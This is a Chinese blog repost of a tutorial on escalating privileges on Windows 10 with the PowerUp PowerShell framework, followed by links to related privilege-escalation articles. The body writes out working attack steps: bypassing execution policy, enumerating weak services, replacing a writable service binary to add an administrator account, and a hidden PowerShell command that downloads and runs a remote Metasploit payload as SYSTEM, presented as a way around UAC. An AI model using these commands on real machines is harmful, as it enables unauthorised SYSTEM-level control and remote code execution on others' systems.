PowerShell 另类提权,win10测试通过,已绕过UAC!

最新推荐文章于 2024-05-12 05:59:42 发布
最新推荐文章于 2024-05-12 05:59:42 发布
阅读量1.7w 收藏 12
点赞数 3
分类专栏: 工具使用教程 文章标签: powershell win10过UAC 绕过UAC提权 另类提权 win10提权

在乌云上看了一篇关于”非常规提权”的做法,试了一下,效果不错.装载过来,顺便加上自己的代码段.

简洁点写,省去大部分,需要阅读原文的请去:http://drops.wooyun.org/tips/11989

0x00 简介

通常,在Windows下面我们可以通过内核漏洞来提升权限,但是,我们常常会碰到所处服务器通过内核漏洞提权是行不通的,这个时候,我们就需要通过脆弱的Windows服务提权,比如我们替换掉服务所依赖的DLL文件,当服务重启时,加载我们替换的DLL文件从而完成比如添加管理员账号的操作。或者通过常见的Mssql,Mysql等服务,通过其继承的系统权限来完成提权等等,而今天我将介绍一个非常实用的Powershell框架-Powerup,此框架可以在内核提权行不通的时候,帮助我们寻找服务器脆弱点进而通过脆弱点实现提权的目的。

要使用Powerup,首先需要下载此脚本:Powerup,之后加载此脚本:

E:> powershell.exe -nop -exec bypass
PS E:\> Import-Module .\PowerUp.psm1

加载完成以后,便可以使用Powerup中的所有模块了。

通过如下命令可以查看所有模块:

PS E:\> Get-Command -Module powerup

看到这个样子就成功了.

成功界面

0x02 实战提权

(我们直接跳到精彩的这里)

测试环境为win10。平常用的虚拟机,并没有特意去配置存在漏洞的环境,所以并不是所有的模块均可以使用。实际测试可以根据实际环境来调整。此次测试并未使用内核漏洞来提权。

首先添加低权限测试账号,使用管理员身份运行cmd,添加测试账号:

C:\Windows\system32>net user powerup 1 /add

查看用户权限

执行Invoke-AllChecks:

Invoke-AllChecks

执行以后找到下列问题:

[*] Checking for unquoted service paths...


ServiceName   : CDROM_Detect
Path          : C:\Program Files\4G USB Modem\4G_Eject.exe
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'CDROM_Detect' -Path <HijackPath>

ServiceName   : hMailServer
Path          : C:\Program Files (x86)\hMailServer\Bin\hMailServer.exe RunAsService
StartName     : LocalSystem
AbuseFunction : Write-ServiceBinary -ServiceName 'hMailServer' -Path <HijackPath>

[*] Checking service executable and argument permissions...

ServiceName    : wampapache
Path           : "c:\wamp\bin\apache\apache2.2.17\bin\httpd.exe" -k runservice
ModifiableFile : c:\wamp\bin\apache\apache2.2.17\bin\httpd.exe
StartName      : LocalSystem
AbuseFunction  : Install-ServiceBinary -ServiceName 'wampapache'

ServiceName    : wampmysqld
Path           : c:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe wampmysqld
ModifiableFile : c:\wamp\bin\mysql\mysql5.5.8\bin\mysqld.exe
StartName      : LocalSystem
AbuseFunction  : Install-ServiceBinary -ServiceName 'wampmysqld'

可以看出,Powerup列出了可能存在问题的服务,并在AbuseFunction中给了接下来的利用方式。在上面两个利用点可以看出,unquoted service paths中给出了两个路径带空格的文件路径,但是因为其在c盘,没有权限,所以并不能被我们利用来提权。而第二个检查通过Get-ServiceFilePermission找到两个当前用户可以写入相关联可执行文件的路径,我们就可以通过这个来进行提权。在AbuseFunction那里已经给了我们操作方式,接下来我们执行如下操作:

PS E:\> Install-ServiceBinary -ServiceName 'wampapache' -UserName rockyou -Password 123

之后当管理员运行该服务的时候,则会添加我们的账号

这里写图片描述

我自己测试发现了”metasploitPostgreSQL” 这个可以被利用。然后改了下上面代码中的服务名,然后测试成功.我测试是反弹msf代码

Install-ServiceBinary -ServiceName 'metasploitPostgreSQL' -Command "powershell.exe -nop -w hidden -c `"IEX ((new-object net.webclient).downloadstring('code_address'))`""
Restore-ServiceBinary -ServiceName 'metasploitPostgreSQL'

然后就成功的上线了,还是绕过了UAC的.屌屌的…

对了,用完就得还原服务哦

Restore-ServiceBinary -ServiceName 'wampapache'

0x03 小结

(我们又跳到小结)

Powerup提供了一些我们并不常见的提权方式,并且为我们的Windows提权提供了极大的方便,如果碰到未安装Powershell的计算机,可以详细参考Powerup里面的函数实现过程来通过别的方式来实现同样的效果,希望本文对你有帮助。

本文由evi1cg原创并首发于乌云drops,转载请注明

Ntinnng
关注
  • 3
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows&BypassUAC&Dll劫持
weixin_39953838的博客
01-17 903
一个姑娘,如果有被人喜欢,而且那个人喜欢的干干净净,怎么都是一件好事!
windows工具
01-15
可以对win2K3-win2012 server进行 win7也可以,win10没试过
2024年网络安全最新Windows方法简单总结_systminfo ,根据系统补丁,真的太香了
最新发布
2401_84544780的博客
05-12 1007
写了好多天的windows与linux技巧,现在做下简单的总结。是后渗透重要的一环节,在限较低的情况下,我们在进行一些操作如读取/写入敏感文件、限维持等会受到束缚,所以需要。在实际中我们会碰到工作组和域环境,工作组环境我们的目的是从普通用户限到管理员或者system限。而域环境中我们通常是从域用户到域管理员限。
win10_x64下shellcode工具(SYSTEM限)
Anansi的博客
11-22 3523
之前写过一篇远线程注入与一篇shellcode编写的文章: Win10_X64远线程注入dll(非CreateRemoteThread) Windows 10_X64环境shellcode编写 上一次是通过远线程注入,将指定的dll模块加载进我们指定的进程,这一次将我们写好的shellcode注入进指定的进程,从而执行任意代码。 首先我们要清楚如何获取一个具有system限的cmd,想要获取一个具有system限的cmd,首先这个cmd得是一个具有system限进程的子进程,windows下具有sys
windows10
qq_54030686的博客
11-15 2499
即可查看到,这里目标是以Administartor测试,这里不进行验证,我都有Administartor了,我直接msf下面getsystem即可,getsystem实际上也是令牌窃取。里面共描述了服务路径,文件限,计划任务,令牌窃取,图形化软件,应用组件安装等,这里只有令牌窃取需要管理员Administrator限,值得注意的是该限并不是管理员组中的其他用户。发现该文件以system限运行,而我们拥有对该文件的修改限,修改daclsve服务的具体执行文件,从而获取system限。
BypassUAC------利用PowerShell绕过UAC
moonhillcity的博客
10-20 4391
转自:http://www.freebuf.com/articles/system/81286.html 背景介绍 UAC(User Account Control,用户帐户控制)是微软为高系统安全而在Windows Vista中引入的新技术,它要求用户在执行可能会影响计算机运行的操作或执行更改影响其他用户的设置的操作之前,限或管理员‌密码。通过在这些操作启动前对其进行验证,U
研究人员利用应用程序路径绕过Windows 10中的UAC机制
weixin_34007906的博客
07-04 315
3月22日讯 安全专家Matt Nelson已经设计出一种最新方法,能够利用应用程序路径(App Paths)顺利绕过Windows 10系统上的用户帐户控制(简称UAC)机制。 这位研究人员详细介绍了一种与此前方案完全不同的旁路技术,项此项新方法“不依赖于IFileOperation/DLL劫持机制”。 Nelson在他发表的一篇博文中表示,“我之前曾...
精简版Win7和Win10可用Powershell
01-21
很多安装精简版的Win7和Win10后没有Powershell,想自己安装Powershell时发现高本版安装不了,很多依赖包精简了就不好安装了。 安装好后记得把Powershell目录路径加入环境变量!!!
powershell解决win10开始菜单和通知中心无法打开
01-20
笔者用的是现在并不成熟的Win10操作系统,昨天首先就遇到了打开计算器出现闪退的情况,然后我google 找到了一个方案 点击开始菜单,输入”Powershell”在搜索结果中右键单击Powershell,选择“以管理员身份运行”在...
Win10Script:赢10 Powershell脚本来调整和更改Windows设置
05-01
作业系统: Windows 10 所需文件: Win10-Menu.ps1 (脚本文件) 推荐文件: _Win10-Script-Run.bat 如何使用 下载/保存以下文件脚本文件: (脚本) 约为201.0 KB需要蝙蝠文件: 约为2.29 KB推荐注意1:请勿重命名...
PowerShell-7.0.0-win-x64.zip
03-30
这意味着Windows PowerShellPowerShell Core用户将能够在Windows、Linux和macOS上跨越使用相同版本的PowerShell,而PowerShell 7用户将与他们所依赖的Windows PowerShell模块具有非常高的兼容性。
解决win10问题,一键,方便
07-26
希望能帮助大家,大家可以试试,我就是这么解决的,很方便
windows下的 Nsudo工具,支持system
02-05
类似Linux下的 sudo 命令的一款windows下工具,支持任意和令牌,包括system账户,附带命令行工具和源代码
驱动中的进程
Rprop
01-25 2762
<br />void NtImprove(HANDLE ProcessHandle) { HANDLE Token; UseData.Status = ZwOpenProcessTokenEx(ProcessHandle, TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY, OBJ_KERNEL_HANDLE, &Token); //Open the access token associated with a process CheckRet; ZwDebugF("
WIN7/8/10下批处理工具
weixin_30846599的博客
03-09 456
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::: 自动添加批处理文件管理员限 :::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::...
Windows工具 CVE-2019-1405 & CVE-2019-1322
K8哥哥
07-15 1609
漏洞介绍 由NCC Group研究人员所发现的两个通过COM本地服务进行非法的漏洞。第一个漏洞CVE-2019-1405是COM服务中的一个逻辑错误,可让本地普通用户以LOCAL SERVICE身份执行任意命令。第二个漏洞CVE-2019-1322是一个简单的服务配置错误,可让本地SERVICE组中的任何用户重新配置以SYSTEM限运行的服务(此漏洞也被其他研究人员发现)。当以上两个漏洞结合在一起时,就允许本地普通用户以SYSTEM限执行任意命令。 全面检查了一些Windows服务,发现以LOCAL
windows辅助工具安装及使用方法
qq_39756628的博客
04-21 429
windows辅助工具使用方法辅助工具介绍辅助工具安装 辅助工具介绍 Windows-Exploit-Suggester 此工具将目标补丁与Microsoft漏洞数据库进行比较,以检测目标上潜在的缺失补丁。 下载链接:https://github.com/GDSSecurity/Windows-Exploit-Suggester/ 辅助工具安装 环境:python2.7 执行 --update以获取漏洞文件 将下载的工具放到桌面 cd desktop C:\Users\Administrator\Des
PowerShell禁用IEESC_UAC_Firewall
weixin_34273481的博客
12-27 150
相信大部分Windows管理员在拿到操作系统的部署应用的第一件事,应该都是关防火墙,关IE增强安全设置等至于为什么要这样做,因为有太多的坑是出在这上面了但一次次的点击容易遗漏,而且麻烦,特别整理了一个禁用的脚本,供大家参考 Function Disable-Firewall{Set-NetFirewallProfile -Enabled False -AllWrite-Host "防火墙已关闭" ...
升-Windows本地-AT+SC+PS命令-进程迁移-令牌窃取-getsystem+UAC
xiaoheizi的博客
08-30 1364
进程迁移注入就是将获取到限低的进程注入至进程中限高的中,这样就实现了升,同时注入进程相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现。操作数据库的限,数据库的增删改等,源码或配置文件泄漏,也可能是网站限(webshell)进行的数据库配置文件读取获得。原理:把我的进程注入到一个现有的system账号运行的进程中,这样我的进程也就具有了system账号的限了。程序路径:Potato/source/Potato/Potato/bin/Release/Potato.exe。
win10 powershell 进程
07-27
Win10上的PowerShell是一种功能强大的命令工具,用于管理和控制Windows系统的各种任务。要列出当前正在运行的进程,你可以使用以下命令: ``` Get-Process ``` 该命令将显示当前正在运行的所有进程的详细信息,包括进程ID、名称、CPU利用率、内存使用量等。你还可以使用其他参数对输出进行筛选和排序。例如,要按内存使用量降序排列进程,可以使用以下命令: ``` Get-Process | Sort-Object -Property WorkingSet -Descending ``` 这只是PowerShell中的一些基本命令,你还可以使用其他命令和参数来执行更多操作,如启动、停止、结束进程等。希望这可以帮助到你!如果有任何其他问题,请随时问。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值